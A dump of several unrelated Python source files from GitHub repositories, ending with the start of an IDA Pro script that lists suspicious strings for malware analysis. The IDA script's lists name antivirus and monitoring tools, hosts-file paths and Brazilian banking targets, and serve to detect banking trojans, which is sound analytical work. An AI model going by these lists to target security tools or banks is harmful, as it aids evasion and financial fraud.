found\n\n\n\t\t\t\tinfo = re.search(r\"[^\\s]*\\([^\\)]*\\)\", l[i])\n\t\t\t\twhile not info is None:\n\t\t\t\t\tinfo_point = info.group()\n\t\t\t\t\tinfo_type = re.search(r\"[^\\(]*\", info_point).group()\n\t\t\t\t\tinfo_info = re.search(r\"\\([^\\)]*\\)\", info_point).group()[1:-1]\n\n\t\t\t\t\tinfo_dict[info_type] = info_info\n\n\n\t\t\t\t\tl[i] = l[i][info.span()[1]:] \t# erase the data we just found\n\n\t\t\t\t\tinfo = re.search(r\"[^\\s]*\\([^\\)]*\\)\", l[i])\t# search for other data\n\n\t\t\t\t\t# print(info_type, \"|\", info_info)\n\t\t\t\t\tif info_type == \"taux-renfort\":\n\t\t\t\t\t\tpokemon_called_rate_list = info_info.split(\", \")\n\n\t\t\t\tif \"localisations\" in info_dict and info_dict[\"localisations\"] == \"masquer\":\n\t\t\t\t\tprint(\"MASKED in \" + location)\n\t\t\t\t\tcontinue\n\n\t\t\t\tfor pokemon in pokemon_tmp_set:\n\t\t\t\t\tif pokemon in info_dict_dict:\n\t\t\t\t\t\tinfo_dict_dict[pokemon].append(info_dict)\n\t\t\t\t\telse:\n\t\t\t\t\t\tinfo_dict_dict[pokemon] = [info_dict]\n\n\t\t\t\tif pokemon_called_list != []:\n\t\t\t\t\tinfo_dict_copy = info_dict.copy()\n\t\t\t\t\ttry:\n\t\t\t\t\t\tdel info_dict_copy[\"renfort\"]\n\t\t\t\t\t\tdel info_dict_copy[\"taux-renfort\"]\n\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\t()\n\n\t\t\t\t\tfor j in range(len(pokemon_called_list)):\n\t\t\t\t\t\tpokemon_called = pokemon_called_list[j]\n\n\t\t\t\t\t\tif not pokemon_called in pokemon_tmp_set:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tfor k in range(len(pokemon_tmp_set)):\n\t\t\t\t\t\t\t\tpokemon_k = pokemon_tmp_set[k]\n\t\t\t\t\t\t\t\tif \"(\" in pokemon_k:\n\t\t\t\t\t\t\t\t\tpokemon_k_without_parentheses = re.sub(r\" [^ ]*\\(.*\", \"\", pokemon_k)\n\n\t\t\t\t\t\t\t\t\tif \"nom(\" in pokemon_k:\n\t\t\t\t\t\t\t\t\t\tname_indix = re.search(r\"nom\\(\", pokemon_k).span()[1]\n\t\t\t\t\t\t\t\t\t\tform_name = pokemon_k[name_indix:pokemon_k.find(\")\", name_indix)]\n\n\t\t\t\t\t\t\t\t\t\tpokemon_tmp_set[k] = pokemon_k_without_parentheses + \" \" + form_name\n\n\t\t\t\t\t\t\t\t\telif \"forme(\" in pokemon_k:\n\t\t\t\t\t\t\t\t\t\tname_indix = re.search(r\"forme\\(\", pokemon_k).span()[1]\n\t\t\t\t\t\t\t\t\t\tform_name = pokemon_k[name_indix:pokemon_k.find(\")\", name_indix)]\n\n\t\t\t\t\t\t\t\t\t\tform_string = \" forme \" + form_name\n\t\t\t\t\t\t\t\t\t\tif form_name == \"Alola\":\n\t\t\t\t\t\t\t\t\t\t\tform_string = \" d'Alola\"\n\n\t\t\t\t\t\t\t\t\t\tpokemon_tmp_set[k] = pokemon_k_without_parentheses + form_string\n\n\t\t\t\t\t\t\tpokemon_str = pokemon_tmp_set[0]\n\t\t\t\t\t\t\tif len(pokemon_tmp_set) >= 2:\n\t\t\t\t\t\t\t\tfor k in range(1, len(pokemon_tmp_set) - 1):\n\t\t\t\t\t\t\t\t\tpokemon_tmp_set_k = pokemon_tmp_set[k]\n\t\t\t\t\t\t\t\t\tpokemon_str\t+= \", \" + pokemon_tmp_set_k\n\t\t\t\t\t\t\t\tpokemon_str += \" et \" + pokemon_tmp_set[-1]\n\n\t\t\t\t\t\t\tinfo_dict_copy[\"milieu\"] = milieu + \" – appelé en renfort par \" + pokemon_str\n\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tinfo_dict_copy[\"taux\"] = pokemon_called_rate_list[j]\n\t\t\t\t\t\t\texcept IndexError:\n\t\t\t\t\t\t\t\tinfo_dict_copy[\"taux\"] = \"100\"\n\n\t\t\t\t\t\t\tif pokemon_called in info_dict_dict:\n\t\t\t\t\t\t\t\tinfo_dict_dict[pokemon_called].append(info_dict_copy)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tinfo_dict_dict[pokemon_called] = [info_dict_copy]\n\n\n\t\telif line == \"\":\n\t\t\tcontinue\n\n\t\telif (started or started_raid) and line[:2] == \"}}\":\n\t\t\t# Reconstruction of the dicts\n\t\t\ttmp_ans = \"\"\n\t\t\tfor pokemon, info_dicts in info_dict_dict.items():\n\t\t\t\tfirst_dict = True\n\t\t\t\tfor info_dict in info_dicts:\n\t\t\t\t\tif first_dict:\n\t\t\t\t\t\ttmp_ans = '\\t\\t[\"' + pokemon + '\"] = {{'\n\t\t\t\t\t\tfirst_dict = False\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmp_ans = tmp_ans + \",\\n\\t\\t\\t{\"\n\n\t\t\t\t\tfirst_item = True\n\t\t\t\t\tfor key, item in info_dict.items():\n\t\t\t\t\t\tif first_item:\n\t\t\t\t\t\t\tfirst_item = False\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttmp_ans = tmp_ans + \", \"\n\t\t\t\t\t\ttmp_ans = tmp_ans + '[\"' + key + '\"] = \"' + item + '\"'\n\t\t\t\t\ttmp_ans = tmp_ans + \"}\"\n\t\t\t\ttmp_ans = tmp_ans + \"}\"\n\n\t\t\t\tif first_line:\n\t\t\t\t\tfirst_line = False\n\t\t\t\telse:\n\t\t\t\t\tans = ans + \",\\n\"\n\t\t\t\tans = ans + tmp_ans\n\t\t\tans = ans + \"\\n\\t}\"\n\n\t\t\tif not savepath is None:\n\t\t\t\tsavefile = open(savepath, \"a\", encoding=\"utf-8\") #use \"a\" mode to append text\n\t\t\t\tsavefile.write(ans)\n\t\t\t\tsavefile.close()\n\n\t\t\t# print(\"** \" + game + \" **\")\n\t\t\t# print(location + \" ok\")\n\t\t\t# print(\"\")\n\n\t\t\t#Reset if there is a new module in the page\n\t\t\tans = \"\"\n\t\t\tmilieu = None\n\t\t\tstarted = False\n\t\t\tstarted_raid = False\n\t\t\tfirst_line = True\n\t\t\tinfo_dict_dict = {}\n\n\t\telse:\n\t\t\tmilieu = line[:-1] # faire un split avec la virgule et la double virgule\n\n\n\t\t\t#while\n\t\t\t()\n\n\tfile.close()\n\nfor game in seen_games:\n\tsavepath = get_savepath(game)\n\tif not savepath is None:\n\t\tsavefile = open(savepath, \"a\", encoding=\"utf-8\") #use \"a\" mode to append text\n\t\tsavefile.write(\"\\n}\")\n\t\tsavefile.close()\n\nif warnings == \"\":\n\tprint(\"No warnings.\")\nelse:\n\tprint(warnings)\n\n# Initial directory cleaning\nif True:\n\tdirectory = \"dumps/locdump/\"\n\ttry:\n\t\tif not os.path.exists(directory):\n\t\t\tos.makedirs(directory)\n\t\telse:\n\t\t\tfiles = [glob.glob(directory + \"*.txt\", recursive=True)]\n\n\t\t\tfor d in files:\n\t\t\t\tfor f in d:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tos.remove(f)\n\t\t\t\t\texcept OSError as e:\n\t\t\t\t \t\tprint(\"Error: %s : %s\" % (f, e.strerror))\n\n\texcept OSError as e:\n\t\tprint(e.strerror)\n","repo_name":"GaletteLithium/pokepedia","sub_path":"locdata_converter.py","file_name":"locdata_converter.py","file_ext":"py","file_size_in_byte":10785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29727597875","text":"import cv2 as cv\n\ndef setLabel(image, str, contour):\n (text_width, text_height), baseline = cv.getTextSize(str, cv.FONT_HERSHEY_SIMPLEX, 0.7, 1)\n x,y,width,height = cv.boundingRect(contour)\n pt_x = x+int((width-text_width)/2)\n pt_y = y+int((height + text_height)/2)\n cv.rectangle(image, (pt_x, pt_y+baseline), (pt_x+text_width, pt_y-text_height), (200,200,200), cv.FILLED)\n cv.putText(image, str, (pt_x, pt_y), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0,0,0), 1, 8)\n\n\nimg_color = cv.imread('test.png', cv.IMREAD_COLOR)\ncv.imshow('result', img_color)\ncv.waitKey(0)\n\nimg_gray = cv.cvtColor(img_color, cv.COLOR_BGR2GRAY)\ncv.imshow('result', img_gray)\ncv.waitKey(0)\n\nret,img_binary = cv.threshold(img_gray, 127, 255, cv.THRESH_BINARY_INV|cv.THRESH_OTSU)\ncv.imshow('result', img_binary)\ncv.waitKey(0)\n\ncontours, hierarchy = cv.findContours(img_binary, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n\nfor cnt in contours:\n size = len(cnt)\n print(size)\n\n epsilon = 0.005 * cv.arcLength(cnt, True)\n approx = cv.approxPolyDP(cnt, epsilon, True)\n\n size = len(approx)\n print(size)\n\n cv.line(img_color, tuple(approx[0][0]), tuple(approx[size-1][0]), (0, 255, 0), 3)\n for k in range(size-1):\n cv.line(img_color, tuple(approx[k][0]), tuple(approx[k+1][0]), (0, 255, 0), 3)\n\n if cv.isContourConvex(approx):\n if size == 3:\n setLabel(img_color, \"triangle\", cnt)\n elif size == 4:\n setLabel(img_color, \"rectangle\", cnt)\n elif size == 5:\n setLabel(img_color, \"pentagon\", cnt)\n elif size == 6:\n setLabel(img_color, \"hexagon\", cnt)\n elif size == 8:\n setLabel(img_color, \"octagon\", cnt)\n elif size == 10:\n setLabel(img_color, \"decagon\", cnt)\n else:\n setLabel(img_color, str(size), cnt)\n else:\n setLabel(img_color, str(size), cnt)\n\ncv.imshow('result', img_color)\ncv.waitKey(0)\n","repo_name":"webnautes/nudapeu","sub_path":"1296-1.py","file_name":"1296-1.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"66"} +{"seq_id":"22153483164","text":"import Poirot\nimport SimpleITK as sitk\n\n\"\"\"Poirot test with fake data\n1. Instantiate Poirot SNR\n1. Set the metric reference in this case a fake SNR\n1. set the ultimate SNR\n1. set the transform between the two spaces (here is faked)\n1. request the output\n\"\"\"\n\n\nmetricMASK='/data/PROJECTS/POIROT/python/testdata/EM_MASK.nii.gz'\nmetric='/data/PROJECTS/POIROT/python/testdata/_FieldSNR.nii.gz'\n\nUXMASK='/data/PROJECTS/POIROT/python/testdata/UISNR_MASK.nii.gz'\nUX='/data/PROJECTS/POIROT/python/testdata/UISNR.nii.gz'\n\nfrom myPy import im\n\n#mask registration\nmMask=im.Imaginable()\nmMask.setInputFileName(metricMASK)\n\nuxMask=im.Imaginable()\nuxMask.setInputFileName(UXMASK)\n\nr=Poirot.MaskRegistration(mMask,uxMask)\n\n# initT=r.transformInitializerGuessRotation()\nr.register()\nT=r.getTransform()\n\n\n\np=Poirot.PoirotSNR()\np.setMetric(metric)\np.setUX(UX)\ndimension = 3\np.setTransform(T)\nO=p.getOutput()\nO.writeImageAs('./testdata/Perf.nii.gz')\nO.writeImageAs('./testdata/Perf.mha')\n\n","repo_name":"cloudmrhub-com/PerformanceMaster","sub_path":"test_04_Poirot.py","file_name":"test_04_Poirot.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2178920511","text":"from parametros import (\r\n MINIMO_ATRIBUTO_DEPORTISTA,\r\n MAXIMO_ATRIBUTO_DEPORTISTA,\r\n PUNTOS_ENTRENAMIENTO,\r\n PONDERADOR_ENTRENAMIENTO_IEEE\r\n )\r\n\r\n\r\nclass Deportista:\r\n\r\n def __init__(self, nombre, vel, res, flex, moral, lesion, precio):\r\n self.nombre = nombre # str\r\n self._velocidad = vel # int\r\n self._resistencia = res # int\r\n self._flexibilidad = flex # int\r\n self._moral = moral # int\r\n self._lesionado = lesion # bool\r\n self.precio = precio # int\r\n\r\n @property\r\n def lesionado(self):\r\n if self._lesionado == \"True\":\r\n return True\r\n if self._lesionado == \"False\":\r\n return False\r\n return self._lesionado\r\n\r\n @property\r\n def velocidad(self):\r\n return self._velocidad\r\n\r\n @velocidad.setter\r\n def velocidad(self, mejora):\r\n if mejora < MINIMO_ATRIBUTO_DEPORTISTA:\r\n self._velocidad = MINIMO_ATRIBUTO_DEPORTISTA\r\n elif mejora > MAXIMO_ATRIBUTO_DEPORTISTA:\r\n self._velocidad = MAXIMO_ATRIBUTO_DEPORTISTA\r\n else:\r\n self._velocidad = mejora\r\n\r\n @property\r\n def resistencia(self):\r\n return self._resistencia\r\n\r\n @resistencia.setter\r\n def resistencia(self, mejora):\r\n if mejora < MINIMO_ATRIBUTO_DEPORTISTA:\r\n self._resistencia = MINIMO_ATRIBUTO_DEPORTISTA\r\n elif mejora > MAXIMO_ATRIBUTO_DEPORTISTA:\r\n self._resistencia = MAXIMO_ATRIBUTO_DEPORTISTA\r\n else:\r\n self._resistencia = mejora\r\n\r\n @property\r\n def flexibilidad(self):\r\n return self._flexibilidad\r\n\r\n @flexibilidad.setter\r\n def flexibilidad(self, mejora):\r\n if mejora < MINIMO_ATRIBUTO_DEPORTISTA:\r\n self._flexibilidad = MINIMO_ATRIBUTO_DEPORTISTA\r\n elif mejora > MAXIMO_ATRIBUTO_DEPORTISTA:\r\n self._flexibilidad = MAXIMO_ATRIBUTO_DEPORTISTA\r\n else:\r\n self._flexibilidad = mejora\r\n\r\n @property\r\n def moral(self):\r\n return self._moral\r\n\r\n @moral.setter\r\n def moral(self, mejora):\r\n if mejora < MINIMO_ATRIBUTO_DEPORTISTA:\r\n self._moral = MINIMO_ATRIBUTO_DEPORTISTA\r\n elif mejora > MAXIMO_ATRIBUTO_DEPORTISTA:\r\n self._moral = MAXIMO_ATRIBUTO_DEPORTISTA\r\n else:\r\n self._moral = mejora\r\n\r\n def entrenar(self, atributo, ponderador):\r\n if atributo == 0:\r\n if self.velocidad == MAXIMO_ATRIBUTO_DEPORTISTA:\r\n print(\"Este atributo ya esta al maximo\")\r\n else:\r\n if ponderador:\r\n self.velocidad += (PUNTOS_ENTRENAMIENTO * PONDERADOR_ENTRENAMIENTO_IEEE)\r\n else:\r\n self.velocidad += PUNTOS_ENTRENAMIENTO\r\n elif atributo == 1:\r\n if self.resistencia == MAXIMO_ATRIBUTO_DEPORTISTA:\r\n print(\"Este atributo ya esta al maximo\")\r\n else:\r\n if ponderador:\r\n self.resistencia += (PUNTOS_ENTRENAMIENTO * PONDERADOR_ENTRENAMIENTO_IEEE)\r\n else:\r\n self.resisitencia += PUNTOS_ENTRENAMIENTO\r\n elif atributo == 2:\r\n if self.flexibilidad == MAXIMO_ATRIBUTO_DEPORTISTA:\r\n print(\"Este atributo ya esta al maximo\")\r\n else:\r\n if ponderador:\r\n self.flexibilidad += (PUNTOS_ENTRENAMIENTO * PONDERADOR_ENTRENAMIENTO_IEEE)\r\n else:\r\n self.flexibilidad += PUNTOS_ENTRENAMIENTO\r\n\r\n def lesionarse(self):\r\n self.lesionado = True\r\n\r\n\r\nif __name__ == \"__main__\":\r\n pass\r\n","repo_name":"stgo32/IIC2233-2020-2","sub_path":"Tareas/T01/deportistas.py","file_name":"deportistas.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72408442769","text":"import os\nimport glob\nimport pandas as pd\npd.options.display.float_format = '{:.3f}'.format\nimport argparse\n\ndef parse_args():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--dataset\",\n\t type=str,\n\t default=None)\n\tparser.add_argument(\"--weight\",\n\t type=float,\n\t default=None)\n\tparser.add_argument(\"--epoch_min\",\n\t type=int,\n\t default=100)\n\tparser.add_argument(\"--epoch_max\",\n\t type=int,\n\t default=300)\n\tparser.add_argument(\"--window_best\",\n\t type=int,\n\t default=5)\n\targs = parser.parse_args()\n\treturn args\n\ndef load_dataframe(fname, ckpt):\n\tcolnames=['Epoch', 'Seed', 'ADE', 'FDE', 'COL']\n\tdf = pd.read_csv(fname, header=None, names=colnames, usecols=[0,1,2,3,4])\n\tdf = df.drop_duplicates(subset=['Epoch', 'Seed'], keep='last')\n\tdf = df[df['Epoch'].isin(ckpt)]\n\t# seed_list = [123]\n\t# df = df[df['Seed'].isin(seed_list)]\n\tdf.reset_index(drop=True, inplace=True)\n\tdf = df.astype({\"Epoch\": int, \"Seed\": int})\n\treturn df\n\ndef relative(df_baseline, df_candidate):\n\tgain_ade = (df_baseline['ADE'] - df_candidate['ADE']) / (df_baseline['ADE'] + 1e-8)\n\tgain_fde = (df_baseline['FDE'] - df_candidate['FDE']) / (df_baseline['FDE'] + 1e-8)\n\tgain_col = (df_baseline['COL'] - df_candidate['COL']) / (df_baseline['COL'] + 1e-8)\n\treturn gain_ade, gain_fde, gain_col\n\ndef select(df, window):\n\tindex_best = (df['ADE'] + df['FDE'] + df['COL']).argmin()\n\t# local window\n\tindex_min = index_best - (window - 1) // 2\n\tindex_max = index_min + window\n\tif index_min < 0:\n\t\tindex_min = 0\n\t\tindex_max = window\n\tif index_max > df.shape[0] - 1:\n\t\tindex_max = df.shape[0]\n\t\tindex_min = index_max - window\n\treturn index_best, (index_min, index_max)\n\ndef compare(foldername, args):\n\n\tepoch_list = [epoch for epoch in range(args.epoch_min, args.epoch_max + 10, 10)]\n\n\tfilevanilla = glob.glob(os.path.join(foldername, '*_0.0000.csv'))[0]\n\tdf_vanilla = load_dataframe(filevanilla, epoch_list)\n\n\tif args.weight:\n\n\t\tfilename = glob.glob(os.path.join(foldername, '*_{:.4f}.csv'.format(args.weight)))[0]\n\t\tdf_snce = load_dataframe(filename, epoch_list)\n\n\t\tprint('\\n----- Detailed Summary -----\\n')\n\t\tprint('Vanilla:\\n', df_vanilla)\n\t\tprint('')\n\t\tprint('SNCE:\\n', df_snce)\n\n\t\tprint('\\n----- Avg of {:d} Seeds -----\\n'.format(len(df_snce['Seed'].unique())))\n\t\tprint('Vanilla:')\n\t\tprint(df_vanilla.mean())\n\t\tprint('')\n\t\tprint('SNCE:')\n\t\tprint(df_snce.mean())\n\n\telse:\n\t\tflist = glob.glob(os.path.join(foldername, '*.csv'))\n\t\tflist.sort(key=lambda filename: float(filename.split('_')[-1][:-4]))\n\t\tflist.remove(filevanilla)\n\n\t\tprint(\" \\t \\t \\tAverage \\t \\t Gain \\t \\t \\t \\t Best \\t \\t \\t Gain \")\n\t\tprint(\" \\t \\t ---------------------\\t --------------------- \\t \\t -----------------------------\\t ---------------------\")\n\t\tprint(\"Method \\tWeight\\t ADE \\t FDE \\t COL \\t ADE \\t FDE \\t COL \\t \\t Epoch \\t ADE \\t FDE \\t COL \\t ADE \\t FDE \\t COL \")\n\n\t\tidx_best_vanilla, window_best_vanilla = select(df_vanilla, args.window_best)\n\t\tbest_vanilla = df_vanilla.iloc[idx_best_vanilla, :]\n\t\tavg_vanilla = df_vanilla.iloc[window_best_vanilla[0]:window_best_vanilla[1], :].mean()\n\n\t\tprint(\"Vanilla\\t 0.00 \\t {:.3f} \\t {:.3f} \\t {:.3f} \\t x \\t x \\t x \\t \\t {:.0f} \\t {:.3f} \\t {:.3f} \\t {:.3f} \\t x \\t x \\t x\".format(avg_vanilla['ADE'], avg_vanilla['FDE'], avg_vanilla['COL'] * 100, best_vanilla['Epoch'], best_vanilla['ADE'], best_vanilla['FDE'], best_vanilla['COL'] * 100))\n\n\t\tmetric_vanilla = (avg_vanilla['ADE'], avg_vanilla['FDE'], avg_vanilla['COL'])\n\t\tmetric_snce = (float('inf'), float('inf'), float('inf'))\t# FDE & COL\n\t\tweight_snce = float('nan')\n\n\t\tfor filename in flist:\n\n\t\t\tweight = float(filename.split('_')[-1][:-4])\n\t\t\tdf_snce = load_dataframe(filename, epoch_list)\n\n\t\t\tidx_best_snce, window_best_snce = select(df_snce, args.window_best)\n\t\t\tbest_snce = df_snce.iloc[idx_best_snce, :]\n\t\t\tavg_snce = df_snce.iloc[window_best_snce[0]:window_best_snce[1], :].mean()\n\n\t\t\tgain_best_ade, gain_best_fde, gain_best_col = relative(best_vanilla, best_snce)\n\t\t\tgain_avg_ade, gain_avg_fde, gain_avg_col = relative(avg_vanilla, avg_snce)\n\n\t\t\tprint(\"S-NCE \\t {:.3f}\\t {:.3f} \\t {:.3f} \\t {:.3f} \\t {:.1f}%\\t {:.1f}%\\t {:.1f}% \\t {:.0f} \\t {:.3f} \\t {:.3f} \\t {:.3f} \\t {:.1f}%\\t {:.1f}%\\t {:.1f}%\".format(weight, avg_snce['ADE'], avg_snce['FDE'], avg_snce['COL'] * 100, gain_avg_ade * 100, gain_avg_fde * 100, gain_avg_col * 100, best_snce['Epoch'], best_snce['ADE'], best_snce['FDE'], best_snce['COL'] * 100, gain_best_ade * 100, gain_best_fde * 100, gain_best_col * 100))\n\n\t\t\tif metric_snce[0] + metric_snce[1] + metric_snce[2] * 100 > avg_snce['ADE'] + avg_snce['FDE'] + avg_snce['COL'] * 100:\n\t\t\t\tmetric_snce = (avg_snce['ADE'], avg_snce['FDE'], avg_snce['COL'])\n\t\t\t\tweight_snce = weight\n\n\t\tprint('Optimal Weight:', weight_snce, '\\n')\n\n\t\treturn metric_vanilla, metric_snce\n\ndef main():\n\targs = parse_args()\n\n\tif args.dataset is None:\n\t\tresult = list()\n\t\tfor dataset in ['eth', 'hotel', 'univ', 'zara1', 'zara2']:\n\t\t\tprint(\"Dataset:\", dataset)\n\t\t\tfoldername = 'experiments/pedestrians/models/snce_' + dataset + '_vel'\n\t\t\t(ade_vanilla, fde_vanilla, col_vanilla), (ade_snce, fde_snce, col_snce) = compare(foldername, args)\n\t\t\tresult.append([dataset, ade_vanilla, fde_vanilla, col_vanilla * 100, ade_snce, fde_snce, col_snce * 100, (1 - col_snce / col_vanilla) * 100 ])\n\t\tdf = pd.DataFrame(result, columns=['Dataset', 'ADE-Vanilla', 'FDE-Vanilla', 'COL-Vanilla', 'ADE-SNCE', 'FDE-SNCE', 'COL-SNCE', 'COL-Gain']).set_index('Dataset')\n\t\tdf.loc['Avg'] = df.mean()\n\t\tprint(df)\n\telse:\n\t\tprint(\"Dataset:\", args.dataset)\n\t\tfoldername = 'experiments/pedestrians/models/snce_' + args.dataset + '_vel'\n\t\tcompare(foldername, args)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"YuejiangLIU/social-nce-trajectron-plus-plus","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"66"} +{"seq_id":"24875480778","text":"import base64\nfrom datetime import date, datetime, timedelta\nfrom io import BytesIO\nfrom zipfile import ZipFile\n\nfrom spotter import Spotter\n\n\nclass WhoisDs(Spotter):\n\n URL = 'https://whoisds.com//whois-database/newly-registered-domains'\n\n def get(self):\n latest_list = []\n past = datetime.strftime(self.now - timedelta(self.config['whoisds']['check-interval']['days']), \"%Y-%m-%d\")\n\n filename = \"{}.zip\".format(past)\n encoded_filename = base64.b64encode(filename.encode('utf-8'))\n \n response = self.session.get('{url}/{file_name}/nrd'.format(url=self.URL, file_name=encoded_filename.decode('ascii')))\n with BytesIO(response.content) as zip_file:\n with ZipFile(zip_file) as zip_file:\n for zip_info in zip_file.infolist():\n with zip_file.open(zip_info) as ffile:\n for line in ffile.readlines():\n latest_list.append(str(line, 'utf-8').rstrip())\n\n return latest_list","repo_name":"fu3l3dSecurity/trawl","sub_path":"spotter/spotter/whoisds.py","file_name":"whoisds.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"3026544966","text":"import pandas as pd\nfrom ortools.sat.python import cp_model\nfrom ortools.constraint_solver import routing_enums_pb2\nfrom ortools.constraint_solver import pywrapcp\nfrom itertools import chain\n\ndef read_data(filePath, mode):\n numNodes = 0\n file = open(filePath, mode)\n line = file.readline().strip()\n numNodes = int(line)\n graph = [ [0]*numNodes for i in range(numNodes)]\n edges = []\n # Last line is an empty string.\n while line != ['']:\n line = file.readline().strip().split(\" \")\n try:\n src = int(line[0])\n dest = int(line[1])\n weight = int(line[2])\n if graph[src][dest] == 0 and graph[dest][src] == 0:\n graph[src][dest] = weight\n graph[dest][src] = weight\n edges.append((src,dest,weight))\n edges.append((dest,src,weight))\n except ValueError:\n # Last line.\n break\n return (numNodes, graph,edges)\n\n\n\ndef create_data_model():\n data = {}\n n,graph,edges = read_data(\"agraph\",'r+')\n data['distance_matrix'] = graph\n data['num_vehicles'] = 1\n data['depot'] = 0\n print(\" 0 \\t 1\\t 2\\t 3\\t 4\\t 5\\t 6\\t 7\\t 8\\t 9\\t 10\\t 11\\t 12\\t 13 \\t 14\\t\")\n print(\"------------------------------------------------------------------------------------------------------------------------------------------\")\n for i in range(len(graph)):\n print(i,end=\" \")\n for j in range(len(graph[i])):\n print(graph[i][j],end=\"\\t\")\n print(\" ]\")\n return n,data,edges\n\ndef objectif_func(list,weights):\n tmp = []\n for i in range(len(list)-1):\n t = list[i]\n t_1 = list[i+1]\n print(t)\n tmp.append(weights[t][t_1])\n return sum(tmp)\n\ndef main():\n model = cp_model.CpModel()\n\n n,data,edges = read_data(\"graph\",'r+')\n print(edges)\n data_flat = list(chain.from_iterable(data))\n min_w = min(data_flat)\n max_w = max(data_flat)\n vars = []\n weights = []\n\n for i in range(n):\n vars.append(model.NewIntVar( 0, n-1, \"a\"+str(i)))\n model.AddAllDifferent(vars)\n for i in range(n-1):\n weights.append(model.NewIntVar(min_w,max_w,\"w\"+str(1)))\n model.AddAllDifferent(weights)\n for i in range(n-1):\n model.AddAllowedAssignments( (vars[i],vars[i+1],weights[i]), edges)\n\n model.Maximize(sum(weights))\n\n # model.Maximize(objectif_func(vars,data))\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n s = 0\n if status == cp_model.OPTIMAL or status == cp_model.FEASIBLE:\n for w in weights:\n s = s + solver.Value(w)\n print(s)\n else:\n print('No solution found.')\n\n solver.ObjectiveValue()\n for i in range(n):\n if i < n-1:\n print(solver.Value(vars[i]),\"-\",solver.Value(weights[i]),\"->\",end=\" \")\n else :\n print(solver.Value(vars[i]))\n\n print('\\n')\n s = 0\n if status == cp_model.OPTIMAL or status == cp_model.FEASIBLE:\n for w in weights:\n s = s + solver.Value(w)\n print(s)\n else:\n print('No solution found.')\n\nif __name__ == '__main__':\n main()","repo_name":"khalidchbab/complexity_longest_path_problem","sub_path":"main_working.py","file_name":"main_working.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14021712689","text":"#!/usr/bin/env python\n\n\"\"\"strings_suspicious.py: Enumerate suspicious strings.\"\"\"\n\n__author__\t= \"Neriberto C.Prado\"\n__copyright__\t= \"Copyright 2015, Neriberto C.Prado\"\n\nfrom idaapi import *\nfrom idc import *\nfrom idautils import *\nimport ctypes\nfrom PySide import QtGui, QtCore\n\n# Disable Security\ndisable_security = [\n \"antivirus\",\n \"antivirusproduct\",\n \"spywareproduct\",\n \"firewallproduct\",\n \"symantec\",\n \"kaspersky\",\n \"kasper~1\",\n \"mcafee\",\n \"avg.com\",\n \"grisoft\",\n \"avastui.exe\",\n \"avastsvc.exe\",\n \"aswchlic.exe\",\n \"ashupd.exe\",\n \"alwil software\",\n \"avast software\",\n \"vipre\",\n \"gfi\",\n \"sunbelt\",\n \"panda\",\n \"security\",\n \"eset\",\n \"nod32\",\n \"avira\",\n \"avp.exe\",\n \"windows defender\",\n \"winddefend\",\n \"wscsvc\",\n \"wuauserv\",\n \"bits\",\n \"ersvc\",\n \"wersvc\",\n \"trendmicro\",\n \"clamav\",\n \"clamd\",\n \"wireshark\",\n \"tcpview\",\n \"regmon\",\n \"procmon\",\n \"procexp\",\n \"mbsa\",\n \"filemon\",\n \"autoruns\",\n \"{fd6905ce-952f-41f1-9a6f-135d9c6622cc}\",\n \"hosts\",\n \":\\\\windows\\\\system32\\\\drivers\\\\etc\\\\hosts\",\n \":\\\\winnt\\\\system32\\\\drivers\\\\etc\\\\hosts\",\n \":\\\\windows\\\\hosts\",\n \"\\\\drivers\\\\etc\\\\hosts\"\n]\n\n# Brazilian Bankers\nbbankers = [\n \"gbplugin\",\n \"cef.gpc\",\n \"bb.gpc\",\n \"banerj\",\n \"bovespa\",\n \"mercantildobrasil\",\n \"boavista\",\n \"bonsucesso\",\n \"bradesco\",\n \"brascan\",\n \"cacique\",\n \"Cifra\",\n \"citibank\",\n \"citicard\",\n \"bancocnh\",\n \"cnhcapital\",\n \"Sudameris\",\n \"sicredi\",\n \"cruzeiro\",\n \"daycoval\",\n \"bandepe\",\n \"dibens\",\n \"bancobrasil\",\n \"bb.com.br\",\n \"bbseguroauto.com.br\",\n \"www.bep.com.br\",\n \"besc.com.br\",\n \"fator.com.br\",\n \"bancofiat\",\n \"ficsa\",\n \"fidis\",\n \"finasa\",\n \"bmc.com.br\",\n \"bmcnet\",\n \"bancoford\",\n \"fordcredit\",\n \"bancoguanabara\",\n \"bcoguan\",\n \"bancohonda\",\n \"unibanco\",\n \"investcred\",\n \"itau\",\n \"safra\",\n \"mercantil\",\n \"bancooriginal\",\n \"panamericano.com.br\",\n \"real.com.br\",\n \"bancoreal\",\n \"rodobens\",\n \"santander\",\n \"sofisa\",\n \"sumitomo\",\n \"bancotoyota\",\n \"bancovw\",\n \"vw.com.br\",\n \"bancovolkswagen\",\n \"bancovotorantim\",\n \"yamaha-motor\",\n \"banestes\",\n \"banif\",\n \"hipercard\",\n \"hsbc\",\n \"jpmorgan\",\n \"bancobva\",\n \"bancofibra\",\n \"caixa.com.br\",\n \"nossacaixa\",\n 